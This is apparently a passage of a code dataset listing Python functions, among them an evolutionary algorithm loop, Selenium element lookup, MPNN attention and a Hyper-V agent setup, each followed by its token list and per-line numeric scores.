"=",
"None",
",",
"maximize",
"=",
"True",
",",
"bounder",
"=",
"None",
",",
"*",
"*",
"args",
")",
":",
"self",
".",
"_kwargs",
"=",
"args",
"self",
".",
"_kwargs",
"[",
"'_ec'",
"]",
"=",
"self",
"if",
"seeds",
"is",
"None",
":",
"seeds",
"=",
"[",
"]",
"if",
"bounder",
"is",
"None",
":",
"bounder",
"=",
"Bounder",
"(",
")",
"self",
".",
"termination_cause",
"=",
"None",
"self",
".",
"generator",
"=",
"generator",
"self",
".",
"evaluator",
"=",
"evaluator",
"self",
".",
"bounder",
"=",
"bounder",
"self",
".",
"maximize",
"=",
"maximize",
"self",
".",
"population",
"=",
"[",
"]",
"self",
".",
"archive",
"=",
"[",
"]",
"# Create the initial population.",
"if",
"not",
"isinstance",
"(",
"seeds",
",",
"collections",
".",
"Sequence",
")",
":",
"seeds",
"=",
"[",
"seeds",
"]",
"initial_cs",
"=",
"copy",
".",
"copy",
"(",
"seeds",
")",
"num_generated",
"=",
"max",
"(",
"pop_size",
"-",
"len",
"(",
"seeds",
")",
",",
"0",
")",
"i",
"=",
"0",
"self",
".",
"logger",
".",
"debug",
"(",
"'generating initial population'",
")",
"while",
"i",
"<",
"num_generated",
":",
"cs",
"=",
"generator",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"initial_cs",
".",
"append",
"(",
"cs",
")",
"i",
"+=",
"1",
"self",
".",
"logger",
".",
"debug",
"(",
"'evaluating initial population'",
")",
"initial_fit",
"=",
"evaluator",
"(",
"candidates",
"=",
"initial_cs",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"for",
"cs",
",",
"fit",
"in",
"zip",
"(",
"initial_cs",
",",
"initial_fit",
")",
":",
"if",
"fit",
"is",
"not",
"None",
":",
"ind",
"=",
"Individual",
"(",
"cs",
",",
"maximize",
"=",
"maximize",
")",
"ind",
".",
"fitness",
"=",
"fit",
"self",
".",
"population",
".",
"append",
"(",
"ind",
")",
"else",
":",
"self",
".",
"logger",
".",
"warning",
"(",
"'excluding candidate {0} because fitness received as None'",
".",
"format",
"(",
"cs",
")",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"self",
".",
"num_evaluations",
"=",
"len",
"(",
"initial_fit",
")",
"self",
".",
"num_generations",
"=",
"0",
"self",
".",
"logger",
".",
"debug",
"(",
"'archiving initial population'",
")",
"self",
".",
"archive",
"=",
"self",
".",
"archiver",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"archive",
"=",
"list",
"(",
"self",
".",
"archive",
")",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'archive size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"archive",
")",
")",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"# Turn observers and variators into lists if not already",
"if",
"isinstance",
"(",
"self",
".",
"observer",
",",
"collections",
".",
"Iterable",
")",
":",
"observers",
"=",
"self",
".",
"observer",
"else",
":",
"observers",
"=",
"[",
"self",
".",
"observer",
"]",
"if",
"isinstance",
"(",
"self",
".",
"variator",
",",
"collections",
".",
"Iterable",
")",
":",
"variators",
"=",
"self",
".",
"variator",
"else",
":",
"variators",
"=",
"[",
"self",
".",
"variator",
"]",
"for",
"obs",
"in",
"observers",
":",
"self",
".",
"logger",
".",
"debug",
"(",
"'observation using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"obs",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"obs",
"(",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"num_generations",
"=",
"self",
".",
"num_generations",
",",
"num_evaluations",
"=",
"self",
".",
"num_evaluations",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"while",
"not",
"self",
".",
"_should_terminate",
"(",
"list",
"(",
"self",
".",
"population",
")",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
":",
"# Select individuals.",
"self",
".",
"logger",
".",
"debug",
"(",
"'selection using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"self",
".",
"selector",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"parents",
"=",
"self",
".",
"selector",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'selected {0} candidates'",
".",
"format",
"(",
"len",
"(",
"parents",
")",
")",
")",
"offspring_cs",
"=",
"[",
"copy",
".",
"deepcopy",
"(",
"i",
".",
"candidate",
")",
"for",
"i",
"in",
"parents",
"]",
"for",
"op",
"in",
"variators",
":",
"self",
".",
"logger",
".",
"debug",
"(",
"'variation using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"op",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"offspring_cs",
"=",
"op",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"candidates",
"=",
"offspring_cs",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'created {0} offspring'",
".",
"format",
"(",
"len",
"(",
"offspring_cs",
")",
")",
")",
"# Evaluate offspring.",
"self",
".",
"logger",
".",
"debug",
"(",
"'evaluation using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"evaluator",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"offspring_fit",
"=",
"evaluator",
"(",
"candidates",
"=",
"offspring_cs",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"offspring",
"=",
"[",
"]",
"for",
"cs",
",",
"fit",
"in",
"zip",
"(",
"offspring_cs",
",",
"offspring_fit",
")",
":",
"if",
"fit",
"is",
"not",
"None",
":",
"off",
"=",
"Individual",
"(",
"cs",
",",
"maximize",
"=",
"maximize",
")",
"off",
".",
"fitness",
"=",
"fit",
"offspring",
".",
"append",
"(",
"off",
")",
"else",
":",
"self",
".",
"logger",
".",
"warning",
"(",
"'excluding candidate {0} because fitness received as None'",
".",
"format",
"(",
"cs",
")",
")",
"self",
".",
"num_evaluations",
"+=",
"len",
"(",
"offspring_fit",
")",
"# Replace individuals.",
"self",
".",
"logger",
".",
"debug",
"(",
"'replacement using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"self",
".",
"replacer",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"self",
".",
"population",
"=",
"self",
".",
"replacer",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"population",
"=",
"self",
".",
"population",
",",
"parents",
"=",
"parents",
",",
"offspring",
"=",
"offspring",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"# Migrate individuals.",
"self",
".",
"logger",
".",
"debug",
"(",
"'migration using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"self",
".",
"migrator",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"self",
".",
"population",
"=",
"self",
".",
"migrator",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"population",
"=",
"self",
".",
"population",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"# Archive individuals.",
"self",
".",
"logger",
".",
"debug",
"(",
"'archival using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"self",
".",
"archiver",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"self",
".",
"archive",
"=",
"self",
".",
"archiver",
"(",
"random",
"=",
"self",
".",
"_random",
",",
"archive",
"=",
"self",
".",
"archive",
",",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'archive size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"archive",
")",
")",
")",
"self",
".",
"logger",
".",
"debug",
"(",
"'population size is now {0}'",
".",
"format",
"(",
"len",
"(",
"self",
".",
"population",
")",
")",
")",
"self",
".",
"num_generations",
"+=",
"1",
"for",
"obs",
"in",
"observers",
":",
"self",
".",
"logger",
".",
"debug",
"(",
"'observation using {0} at generation {1} and evaluation {2}'",
".",
"format",
"(",
"obs",
".",
"__name__",
",",
"self",
".",
"num_generations",
",",
"self",
".",
"num_evaluations",
")",
")",
"obs",
"(",
"population",
"=",
"list",
"(",
"self",
".",
"population",
")",
",",
"num_generations",
"=",
"self",
".",
"num_generations",
",",
"num_evaluations",
"=",
"self",
".",
"num_evaluations",
",",
"args",
"=",
"self",
".",
"_kwargs",
")",
"return",
"self",
".",
"population"
] | 55.224638 | [
0.0196078431372549,
0.06060606060606061,
0.25,
0.02631578947368421,
0.025974025974025976,
0.025974025974025976,
0.02631578947368421,
0.038461538461538464,
0.0625,
0.25,
0.1111111111111111,
0.25,
0.06172839506172839,
0.05,
0.06172839506172839,
0.03896103896103896,
0.08,
0.0625,
0.06097560975609756,
0.05660377358490566,
0,
0.0641025641025641,
0.04,
0.08641975308641975,
0.047058823529411764,
0.08,
0.25,
0.06557377049180328,
0.25,
0.18181818181818182,
0.07407407407407407,
0.058823529411764705,
0.25,
0.08,
0.09090909090909091,
0.07407407407407407,
0.06451612903225806,
0.25,
0.05405405405405406,
0.058823529411764705,
0.058823529411764705,
0.06666666666666667,
0.0625,
0.07142857142857142,
0.08,
0.25,
0.05,
0.03636363636363636,
0.07407407407407407,
0.05405405405405406,
0.03773584905660377,
0.15384615384615385,
0.034482758620689655,
0.0625,
0.030303030303030304,
0.06060606060606061,
0.1111111111111111,
0.034482758620689655,
0.0273972602739726,
0.25,
0.038461538461538464,
0.06451612903225806,
0.03636363636363636,
0.06060606060606061,
0.046511627906976744,
0.11764705882352941,
0.02830188679245283,
0.03571428571428571,
0.25,
0.0425531914893617,
0.0625,
0.25,
0.03508771929824561,
0.021739130434782608,
0.02564102564102564,
0.03571428571428571,
0,
0.03125,
0.03389830508474576,
0.05405405405405406,
0.15384615384615385,
0.05128205128205128,
0.03389830508474576,
0.05405405405405406,
0.15384615384615385,
0.05128205128205128,
0,
0.06896551724137931,
0.019230769230769232,
0.020833333333333332,
0.25,
0.027777777777777776,
0.06060606060606061,
0.018292682926829267,
0.027522935779816515,
0.025974025974025976,
0.027777777777777776,
0.16666666666666666,
0.0625,
0.01910828025477707,
0.030612244897959183,
0.0375,
0.16666666666666666,
0.06060606060606061,
0.018633540372670808,
0.037037037037037035,
0.07692307692307693,
0.03333333333333333,
0.05714285714285714,
0.03389830508474576,
0.05405405405405406,
0.04878048780487805,
0.09523809523809523,
0.02727272727272727,
0.04838709677419355,
0,
0.058823529411764705,
0.018072289156626505,
0.020134228187919462,
0.03409090909090909,
0.16666666666666666,
0.058823529411764705,
0.018292682926829267,
0.02702702702702703,
0.03409090909090909,
0.16666666666666666,
0.058823529411764705,
0.018404907975460124,
0.022058823529411766,
0.036585365853658534,
0.03409090909090909,
0.16666666666666666,
0.05405405405405406,
0.06060606060606061,
0.01875,
0.02027027027027027,
0,
0.06666666666666667
] |
def to_archivable_dict(self, dialect, use_dirty=True):
"""
:param dialect: a :py:class:`~sqlalchemy.engine.interfaces.Dialect` corresponding to the \
SQL dialect being used.
:param use_dirty: whether to make a dict of the fields as they stand, or the fields \
before the row was updated
:return: a dictionary of key value pairs representing this row.
:rtype: dict
"""
return {
cn: utils.get_column_attribute(self, c, use_dirty=use_dirty, dialect=dialect)
for c, cn in utils.get_column_keys_and_names(self)
if c not in self.ignore_columns
} | [
"def",
"to_archivable_dict",
"(",
"self",
",",
"dialect",
",",
"use_dirty",
"=",
"True",
")",
":",
"return",
"{",
"cn",
":",
"utils",
".",
"get_column_attribute",
"(",
"self",
",",
"c",
",",
"use_dirty",
"=",
"use_dirty",
",",
"dialect",
"=",
"dialect",
")",
"for",
"c",
",",
"cn",
"in",
"utils",
".",
"get_column_keys_and_names",
"(",
"self",
")",
"if",
"c",
"not",
"in",
"self",
".",
"ignore_columns",
"}"
] | 43.333333 | [
0.018518518518518517,
0.18181818181818182,
0.09183673469387756,
0.05714285714285714,
0.043010752688172046,
0.05263157894736842,
0,
0.04225352112676056,
0.15,
0.18181818181818182,
0.1875,
0.033707865168539325,
0.03225806451612903,
0.046511627906976744,
0.3333333333333333
] |
def add_rel(self, source_node_id, target_node_id, rel):
"""Add a relationship between nodes.
Args:
source_node_id: Node Id for the source node.
target_node_id: Node Id for the target node.
rel: Name of the relationship 'contains'
"""
# Add the relationship
n1_ref = self.graph_db.get_indexed_node('Node', 'node_id', source_node_id)
n2_ref = self.graph_db.get_indexed_node('Node', 'node_id', target_node_id)
# Sanity check
if not n1_ref or not n2_ref:
print 'Cannot add relationship between unfound nodes: %s --> %s' % (source_node_id, target_node_id)
return
path = neo4j.Path(n1_ref, rel, n2_ref)
path.get_or_create(self.graph_db) | [
"def",
"add_rel",
"(",
"self",
",",
"source_node_id",
",",
"target_node_id",
",",
"rel",
")",
":",
"# Add the relationship",
"n1_ref",
"=",
"self",
".",
"graph_db",
".",
"get_indexed_node",
"(",
"'Node'",
",",
"'node_id'",
",",
"source_node_id",
")",
"n2_ref",
"=",
"self",
".",
"graph_db",
".",
"get_indexed_node",
"(",
"'Node'",
",",
"'node_id'",
",",
"target_node_id",
")",
"# Sanity check",
"if",
"not",
"n1_ref",
"or",
"not",
"n2_ref",
":",
"print",
"'Cannot add relationship between unfound nodes: %s --> %s'",
"%",
"(",
"source_node_id",
",",
"target_node_id",
")",
"return",
"path",
"=",
"neo4j",
".",
"Path",
"(",
"n1_ref",
",",
"rel",
",",
"n2_ref",
")",
"path",
".",
"get_or_create",
"(",
"self",
".",
"graph_db",
")"
] | 39.736842 | [
0.01818181818181818,
0.045454545454545456,
0,
0.15384615384615385,
0.03571428571428571,
0.03571428571428571,
0.038461538461538464,
0.18181818181818182,
0,
0.06666666666666667,
0.036585365853658534,
0.036585365853658534,
0,
0.09090909090909091,
0.05555555555555555,
0.02702702702702703,
0.1111111111111111,
0.043478260869565216,
0.04878048780487805
] |
def compute_mpnn_qkv(node_states,
total_key_depth,
total_value_depth,
num_transforms):
"""Computes query, key and value for edge matrices.
Let B be the number of batches.
Let N be the number of nodes in the graph.
Let D be the size of the node hidden states.
Let K be the size of the attention keys/queries (total_key_depth).
Let V be the size of the attention values (total_value_depth).
Let T be the total number of transforms (num_transforms).
Computes the queries, keys, and values for attention.
* For each node N_i in the graph, a query Q_i of size K is computed. This
query is used to determine the relative weights to give to each of the
node's incoming edges.
* For each node N_j and edge type t, a key K_jt of size K is computed. When an
edge of type t goes from node N_j to any other node, K_jt is the key that is
in the attention process.
* For each node N_j and edge type t, a value V_jt of size V is computed. When
an edge of type t goes from node N_j to node N_i, Attention(Q_i, K_jt)
produces a weight w_ijt. The message sent along this edge is w_ijt * V_jt.
Args:
node_states: A Tensor with shape [B, N, D].
total_key_depth: an integer (K).
total_value_depth: an integer (V).
num_transforms: a integer specifying number of transforms (T). This is
typically the number of edge types.
Returns:
q: The attention queries for each destination node (shape [B, N, K]).
k: The attention keys for each node and edge type (shape [B, N*T, K]).
v: The attention values for each node and edge type (shape [B, N*T, V]).
"""
# node_states is initially a tensor with shape [B, N, D]. The call to dense
# creates a D x K kernel that serves as a fully-connected layer.
#
# For each possible batch b and node n in the first two dimensions of
# node_states, the corresponding size-D vector (the third dimension of
# node_states) is the hidden state for node n in batch b. Each of these size-D
# vectors is multiplied by the kernel to produce an attention query of size K.
# The result is a tensor of size [B, N, K] containing the attention queries
# for each node in each batch.
q = common_layers.dense(
node_states, total_key_depth, use_bias=False, name="q_mpnn")
# Creates the attention keys in a manner similar to the process of creating
# the attention queries. One key is created for each type of outgoing edge the
# corresponding node might have, meaning k will have shape [B, N, K*T].
k = _compute_edge_transforms(node_states,
total_key_depth,
num_transforms,
name="k_mpnn")
v = _compute_edge_transforms(node_states,
total_value_depth,
num_transforms,
name="v_mpnn")
return q, k, v | [
"def",
"compute_mpnn_qkv",
"(",
"node_states",
",",
"total_key_depth",
",",
"total_value_depth",
",",
"num_transforms",
")",
":",
"# node_states is initially a tensor with shape [B, N, D]. The call to dense",
"# creates a D x K kernel that serves as a fully-connected layer.",
"#",
"# For each possible batch b and node n in the first two dimensions of",
"# node_states, the corresponding size-D vector (the third dimension of",
"# node_states) is the hidden state for node n in batch b. Each of these size-D",
"# vectors is multiplied by the kernel to produce an attention query of size K.",
"# The result is a tensor of size [B, N, K] containing the attention queries",
"# for each node in each batch.",
"q",
"=",
"common_layers",
".",
"dense",
"(",
"node_states",
",",
"total_key_depth",
",",
"use_bias",
"=",
"False",
",",
"name",
"=",
"\"q_mpnn\"",
")",
"# Creates the attention keys in a manner similar to the process of creating",
"# the attention queries. One key is created for each type of outgoing edge the",
"# corresponding node might have, meaning k will have shape [B, N, K*T].",
"k",
"=",
"_compute_edge_transforms",
"(",
"node_states",
",",
"total_key_depth",
",",
"num_transforms",
",",
"name",
"=",
"\"k_mpnn\"",
")",
"v",
"=",
"_compute_edge_transforms",
"(",
"node_states",
",",
"total_value_depth",
",",
"num_transforms",
",",
"name",
"=",
"\"v_mpnn\"",
")",
"return",
"q",
",",
"k",
",",
"v"
] | 47.606557 | [
0.06060606060606061,
0.08108108108108109,
0.07692307692307693,
0.10810810810810811,
0.03773584905660377,
0,
0.09090909090909091,
0.06818181818181818,
0.06521739130434782,
0.058823529411764705,
0.0625,
0.06779661016949153,
0,
0.05454545454545454,
0.04,
0.02702702702702703,
0.07692307692307693,
0.05,
0.0375,
0.06896551724137931,
0.0379746835443038,
0.02702702702702703,
0.02564102564102564,
0,
0.42857142857142855,
0.06382978723404255,
0.08333333333333333,
0.07894736842105263,
0.04054054054054054,
0.07317073170731707,
0.3,
0.0547945205479452,
0.05405405405405406,
0.05263157894736842,
0.4,
0,
0.03896103896103896,
0.045454545454545456,
1,
0.04225352112676056,
0.041666666666666664,
0.05,
0.05,
0.03896103896103896,
0.09375,
0.15384615384615385,
0.09090909090909091,
0,
0.03896103896103896,
0.05,
0.0410958904109589,
0.09302325581395349,
0.06382978723404255,
0.06521739130434782,
0.1111111111111111,
0.09302325581395349,
0.061224489795918366,
0.06521739130434782,
0.1111111111111111,
0,
0.1875
] |
def location(self):
"""Return the location of the printer."""
try:
return self.data.get('identity').get('location')
except (KeyError, AttributeError):
return self.device_status_simple('') | [
"def",
"location",
"(",
"self",
")",
":",
"try",
":",
"return",
"self",
".",
"data",
".",
"get",
"(",
"'identity'",
")",
".",
"get",
"(",
"'location'",
")",
"except",
"(",
"KeyError",
",",
"AttributeError",
")",
":",
"return",
"self",
".",
"device_status_simple",
"(",
"''",
")"
] | 39.166667 | [
0.05,
0.02,
0.23076923076923078,
0.01639344262295082,
0.06976744186046512,
0.041666666666666664
] |
def find_elements(self, by=By.ID, value=None):
"""
Find elements given a By strategy and locator. Prefer the find_elements_by_* methods when
possible.
:Usage:
::
elements = driver.find_elements(By.CLASS_NAME, 'foo')
:rtype: list of WebElement
"""
if self.w3c:
if by == By.ID:
by = By.CSS_SELECTOR
value = '[id="%s"]' % value
elif by == By.TAG_NAME:
by = By.CSS_SELECTOR
elif by == By.CLASS_NAME:
by = By.CSS_SELECTOR
value = ".%s" % value
elif by == By.NAME:
by = By.CSS_SELECTOR
value = '[name="%s"]' % value
# Return empty list if driver returns null
# See https://github.com/SeleniumHQ/selenium/issues/4555
return self.execute(Command.FIND_ELEMENTS, {
'using': by,
'value': value})['value'] or [] | [
"def",
"find_elements",
"(",
"self",
",",
"by",
"=",
"By",
".",
"ID",
",",
"value",
"=",
"None",
")",
":",
"if",
"self",
".",
"w3c",
":",
"if",
"by",
"==",
"By",
".",
"ID",
":",
"by",
"=",
"By",
".",
"CSS_SELECTOR",
"value",
"=",
"'[id=\"%s\"]'",
"%",
"value",
"elif",
"by",
"==",
"By",
".",
"TAG_NAME",
":",
"by",
"=",
"By",
".",
"CSS_SELECTOR",
"elif",
"by",
"==",
"By",
".",
"CLASS_NAME",
":",
"by",
"=",
"By",
".",
"CSS_SELECTOR",
"value",
"=",
"\".%s\"",
"%",
"value",
"elif",
"by",
"==",
"By",
".",
"NAME",
":",
"by",
"=",
"By",
".",
"CSS_SELECTOR",
"value",
"=",
"'[name=\"%s\"]'",
"%",
"value",
"# Return empty list if driver returns null",
"# See https://github.com/SeleniumHQ/selenium/issues/4555",
"return",
"self",
".",
"execute",
"(",
"Command",
".",
"FIND_ELEMENTS",
",",
"{",
"'using'",
":",
"by",
",",
"'value'",
":",
"value",
"}",
")",
"[",
"'value'",
"]",
"or",
"[",
"]"
] | 32.2 | [
0.021739130434782608,
0.18181818181818182,
0.041237113402061855,
0.11764705882352941,
0,
0.2,
0.21428571428571427,
0,
0.028985507246376812,
0,
0.08823529411764706,
0.18181818181818182,
0.1,
0.07407407407407407,
0.05555555555555555,
0.046511627906976744,
0.05714285714285714,
0.05555555555555555,
0.05405405405405406,
0.05555555555555555,
0.05405405405405406,
0.06451612903225806,
0.05555555555555555,
0.044444444444444446,
0,
0.04,
0.03125,
0.057692307692307696,
0.08333333333333333,
0.06976744186046512
] |
def read_PIA0_B_control(self, cpu_cycles, op_address, address):
"""
read from 0xff03 -> PIA 0 B side Control reg.
"""
value = self.pia_0_B_control.value
log.error(
"%04x| read $%04x (PIA 0 B side Control reg.) send $%02x (%s) back.\t|%s",
op_address, address, value, byte2bit_string(value),
self.cfg.mem_info.get_shortest(op_address)
)
return value | [
"def",
"read_PIA0_B_control",
"(",
"self",
",",
"cpu_cycles",
",",
"op_address",
",",
"address",
")",
":",
"value",
"=",
"self",
".",
"pia_0_B_control",
".",
"value",
"log",
".",
"error",
"(",
"\"%04x| read $%04x (PIA 0 B side Control reg.) send $%02x (%s) back.\\t|%s\"",
",",
"op_address",
",",
"address",
",",
"value",
",",
"byte2bit_string",
"(",
"value",
")",
",",
"self",
".",
"cfg",
".",
"mem_info",
".",
"get_shortest",
"(",
"op_address",
")",
")",
"return",
"value"
] | 39.090909 | [
0.015873015873015872,
0.18181818181818182,
0.03773584905660377,
0.18181818181818182,
0.047619047619047616,
0.16666666666666666,
0.03488372093023256,
0.031746031746031744,
0.037037037037037035,
0.3333333333333333,
0.1
] |
def reincarnate(self, process):
"""
:param process: the process to reincarnate
:type process: Process or None
"""
db.connections.close_all() # Close any old connections
if process == self.monitor:
self.monitor = self.spawn_monitor()
logger.error(_("reincarnated monitor {} after sudden death").format(process.name))
elif process == self.pusher:
self.pusher = self.spawn_pusher()
logger.error(_("reincarnated pusher {} after sudden death").format(process.name))
else:
self.pool.remove(process)
self.spawn_worker()
if process.timer.value == 0:
# only need to terminate on timeout, otherwise we risk destabilizing the queues
process.terminate()
logger.warn(_("reincarnated worker {} after timeout").format(process.name))
elif int(process.timer.value) == -2:
logger.info(_("recycled worker {}").format(process.name))
else:
logger.error(_("reincarnated worker {} after death").format(process.name))
self.reincarnations += 1 | [
"def",
"reincarnate",
"(",
"self",
",",
"process",
")",
":",
"db",
".",
"connections",
".",
"close_all",
"(",
")",
"# Close any old connections",
"if",
"process",
"==",
"self",
".",
"monitor",
":",
"self",
".",
"monitor",
"=",
"self",
".",
"spawn_monitor",
"(",
")",
"logger",
".",
"error",
"(",
"_",
"(",
"\"reincarnated monitor {} after sudden death\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"elif",
"process",
"==",
"self",
".",
"pusher",
":",
"self",
".",
"pusher",
"=",
"self",
".",
"spawn_pusher",
"(",
")",
"logger",
".",
"error",
"(",
"_",
"(",
"\"reincarnated pusher {} after sudden death\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"else",
":",
"self",
".",
"pool",
".",
"remove",
"(",
"process",
")",
"self",
".",
"spawn_worker",
"(",
")",
"if",
"process",
".",
"timer",
".",
"value",
"==",
"0",
":",
"# only need to terminate on timeout, otherwise we risk destabilizing the queues",
"process",
".",
"terminate",
"(",
")",
"logger",
".",
"warn",
"(",
"_",
"(",
"\"reincarnated worker {} after timeout\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"elif",
"int",
"(",
"process",
".",
"timer",
".",
"value",
")",
"==",
"-",
"2",
":",
"logger",
".",
"info",
"(",
"_",
"(",
"\"recycled worker {}\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"else",
":",
"logger",
".",
"error",
"(",
"_",
"(",
"\"reincarnated worker {} after death\"",
")",
".",
"format",
"(",
"process",
".",
"name",
")",
")",
"self",
".",
"reincarnations",
"+=",
"1"
] | 46.24 | [
0.03225806451612903,
0.18181818181818182,
0.06,
0.07894736842105263,
0.18181818181818182,
0.031746031746031744,
0.05714285714285714,
0.0425531914893617,
0.031914893617021274,
0.05555555555555555,
0.044444444444444446,
0.03225806451612903,
0.15384615384615385,
0.05405405405405406,
0.06451612903225806,
0.05,
0.031578947368421054,
0.05714285714285714,
0.03296703296703297,
0.041666666666666664,
0.0273972602739726,
0.11764705882352941,
0.03333333333333333,
0,
0.0625
] |
def emit(self, record):
"""Actually log the specified logging record.
Overrides the default emit behavior of ``StreamHandler``.
See https://docs.python.org/2/library/logging.html#handler-objects
:type record: :class:`logging.LogRecord`
:param record: The record to be logged.
"""
message = super(CloudLoggingHandler, self).format(record)
self.transport.send(record, message, resource=self.resource, labels=self.labels) | [
"def",
"emit",
"(",
"self",
",",
"record",
")",
":",
"message",
"=",
"super",
"(",
"CloudLoggingHandler",
",",
"self",
")",
".",
"format",
"(",
"record",
")",
"self",
".",
"transport",
".",
"send",
"(",
"record",
",",
"message",
",",
"resource",
"=",
"self",
".",
"resource",
",",
"labels",
"=",
"self",
".",
"labels",
")"
] | 39.5 | [
0.043478260869565216,
0.03773584905660377,
0,
0.046153846153846156,
0,
0.06756756756756757,
0,
0.14583333333333334,
0.06382978723404255,
0.18181818181818182,
0.03076923076923077,
0.03409090909090909
] |
def from_mapping(cls, evidence_mapping):
"""Create an Evidence instance from the given mapping
:param evidence_mapping: a mapping (e.g. dict) of values provided by Watson
:return: a new Evidence
"""
return cls(metadata_map=MetadataMap.from_mapping(evidence_mapping['metadataMap']),
copyright=evidence_mapping['copyright'],
id=evidence_mapping['id'],
terms_of_use=evidence_mapping['termsOfUse'],
document=evidence_mapping['document'],
title=evidence_mapping['title'],
text=evidence_mapping['text'],
value=evidence_mapping['value']) | [
"def",
"from_mapping",
"(",
"cls",
",",
"evidence_mapping",
")",
":",
"return",
"cls",
"(",
"metadata_map",
"=",
"MetadataMap",
".",
"from_mapping",
"(",
"evidence_mapping",
"[",
"'metadataMap'",
"]",
")",
",",
"copyright",
"=",
"evidence_mapping",
"[",
"'copyright'",
"]",
",",
"id",
"=",
"evidence_mapping",
"[",
"'id'",
"]",
",",
"terms_of_use",
"=",
"evidence_mapping",
"[",
"'termsOfUse'",
"]",
",",
"document",
"=",
"evidence_mapping",
"[",
"'document'",
"]",
",",
"title",
"=",
"evidence_mapping",
"[",
"'title'",
"]",
",",
"text",
"=",
"evidence_mapping",
"[",
"'text'",
"]",
",",
"value",
"=",
"evidence_mapping",
"[",
"'value'",
"]",
")"
] | 49.357143 | [
0.025,
0.03278688524590164,
0,
0.060240963855421686,
0.0967741935483871,
0.18181818181818182,
0.044444444444444446,
0.06779661016949153,
0.08888888888888889,
0.06349206349206349,
0.07017543859649122,
0.0784313725490196,
0.08163265306122448,
0.09803921568627451
] |
def simxGetObjectPosition(clientID, objectHandle, relativeToObjectHandle, operationMode):
'''
Please have a look at the function description/documentation in the V-REP user manual
'''
position = (ct.c_float*3)()
ret = c_GetObjectPosition(clientID, objectHandle, relativeToObjectHandle, position, operationMode)
arr = []
for i in range(3):
arr.append(position[i])
return ret, arr | [
"def",
"simxGetObjectPosition",
"(",
"clientID",
",",
"objectHandle",
",",
"relativeToObjectHandle",
",",
"operationMode",
")",
":",
"position",
"=",
"(",
"ct",
".",
"c_float",
"*",
"3",
")",
"(",
")",
"ret",
"=",
"c_GetObjectPosition",
"(",
"clientID",
",",
"objectHandle",
",",
"relativeToObjectHandle",
",",
"position",
",",
"operationMode",
")",
"arr",
"=",
"[",
"]",
"for",
"i",
"in",
"range",
"(",
"3",
")",
":",
"arr",
".",
"append",
"(",
"position",
"[",
"i",
"]",
")",
"return",
"ret",
",",
"arr"
] | 40.9 | [
0.02247191011235955,
0.2857142857142857,
0.033707865168539325,
0.2857142857142857,
0.06451612903225806,
0.029411764705882353,
0.16666666666666666,
0.09090909090909091,
0.06451612903225806,
0.10526315789473684
] |
def _setup(self):
"""Setup the layer two agent."""
super(HyperVNeutronAgent, self)._setup()
self._sg_plugin_rpc = sg_rpc.SecurityGroupServerRpcApi(topics.PLUGIN)
self._sec_groups_agent = HyperVSecurityAgent(self._context,
self._sg_plugin_rpc)
self._vlan_driver = trunk_driver.HyperVTrunkDriver(self._context)
if CONF.NVGRE.enable_support:
self._consumers.append([h_constant.TUNNEL, topics.UPDATE])
self._consumers.append([h_constant.LOOKUP, h_constant.UPDATE]) | [
"def",
"_setup",
"(",
